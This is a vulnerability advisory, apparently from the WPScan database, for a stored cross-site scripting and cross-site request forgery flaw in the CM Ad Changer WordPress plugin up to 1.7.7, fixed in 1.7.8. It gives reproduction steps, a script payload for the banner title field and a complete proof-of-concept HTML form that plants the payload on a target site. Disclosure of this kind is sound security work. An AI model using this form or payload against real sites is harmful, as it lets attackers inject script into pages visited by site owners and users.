CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)


A stored cross-site scripting (XSS) vulnerability in CM Ad Changer was reported by the submitter to the plugin's vendor, CM Plugins. An unprivileged user can store a script payload in a campaign's banner title, and the payload executes whenever the affected page is rendered. Because the campaign save request can also be submitted from a third-party page (CSRF), any attacker can send a crafted link or page that plants the stored XSS on the victim's behalf.
Proof of Concept
1) Go to CM Ad Changer -> Campaigns.

2) Create a campaign. Enter anything you like in Campaign Settings, then on the next tab, "Campaign Banners", select an image under Campaign Images and enter the payload into Banner Title (the same value used in the banner_title[] field of the form below: </script><script>confirm(/aaditya/)</script>).

3) Click Save. The payload fires every time you return to the page.

For the CSRF variant, the attacker hosts an HTML page containing the following form. {TARGET_ID} is a placeholder for the campaign save URL on the target site, and yourpicvalue.jpg stands for an image filename that exists in the target campaign:

    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="{TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>

Submitting the form stores the payload in the banner_title[] parameter and triggers the stored XSS wherever that title is rendered.


Plugin cm-ad-changer
fixed in version 1.7.8




Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)


Submitter Aaditya Purani
Submitter Website
Submitter Twitter aaditya_purani
Views 98
Verified No


Publicly Published 2016-06-09 (5 months ago)
Added 2016-06-13 (5 months ago)
Last Updated 2016-06-13 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.